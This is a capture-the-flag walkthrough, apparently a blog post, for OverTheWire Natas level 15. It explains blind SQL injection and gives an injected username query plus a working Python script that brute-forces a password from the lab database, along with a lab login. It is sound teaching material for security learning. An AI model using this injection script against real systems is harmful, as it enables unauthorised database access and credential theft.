OverTheWire Natas Level 14 -> Level 15 - Walkthrough

OverTheWire Natas Solutions

Introduction

In this level, I'll give you a walkthrough to the natas wargame Level 14 -> Level 15. We will see the blind sql injection vulnerability and use python code to get the password for next level.

Goal 

Login to natas15 and get the password for next level.

Login details

URL - http://natas15.natas.labs.overthewire.org
Username - natas15
Password - TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB

Theory

Blind SQL injection is similar to SQL injection which we saw in the previous level. In this attack, the database gives output in true or false fashion and the attacker gathers the answer based on it. This makes the exploitation difficult but not impossible.

Brute Force scripting is usually used to get the password for such cases as we get the information one piece after another. So, we will create python script to brute force and get the password.

Solution

Open the URL in a browser. Enter the username and password mentioned above.

The below screen appears on successfully logging in where it asks to enter a username and tells whether it exists or not.

Lets see the source code. Click "View sourcecode".

The code checks username entered in the application and outputs whether the user exists or not.
Notice that in the code, the comment states that a table by the name "users" was created containing "username" and "password" as columns. So, we need to find the password for natas16 username.

The query in the source code can be translated to-:
SELECT * from users where username="username";

The username is within double quotes and since it is not properly sanitized, we can try to exploit it and insert our own query. We need to create a query such that it will ask questions like "whether the password for natas16 is A?" and get the result from the web application.

The query will be like-:
SELECT * from users where username="natas16" and password like binary "x%";

This will get the output whether the password has the specified character or not and we can get each character one after the other. The "binary" keyword makes the query case sensitive.
Enter - natas16" and password like binary "T% - in the username field to see the output.

To do this continuously, we will write a script in python to get the password. Save below script in a file and execute it.
import requests
import sys
from string import digits, ascii_lowercase, ascii_uppercase
url = "http://natas15.natas.labs.overthewire.org/"
characters = ascii_lowercase + ascii_uppercase + digits
qry = 'natas16" AND password LIKE BINARY "'
s = requests.Session()
s.auth = ('natas15', 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB')
password = "" 
while len(password) < 32:
    for c in characters:
        r = s.post('http://natas15.natas.labs.overthewire.org/', data={'username':qry + password + c + "%"})
        if "This user exists" in r.text:
            sys.stdout.write(c)
            sys.stdout.flush()
            password += c
            break

The script uses python libraries to connect to the natas15 url and creates a session. Based on the previous natas password, we have taken the length of natas16 password to be 32 and iterated the while loop based on it. The for loop passes every character to the query and if it exists then the character is output on the screen as well as appended to the password variable which is again used in the next iteration.

I have run the script on Linux platform using the below command-:
python3 natas15.py

It will take few minutes to give the output since it is brute forcing.

This completes the walkthrough for natas Level 15 as we have got the password for next level. Please post your questions and doubts in the comment section. Also learn about python or any other scripting language to write scripts and get better in cybersecurity.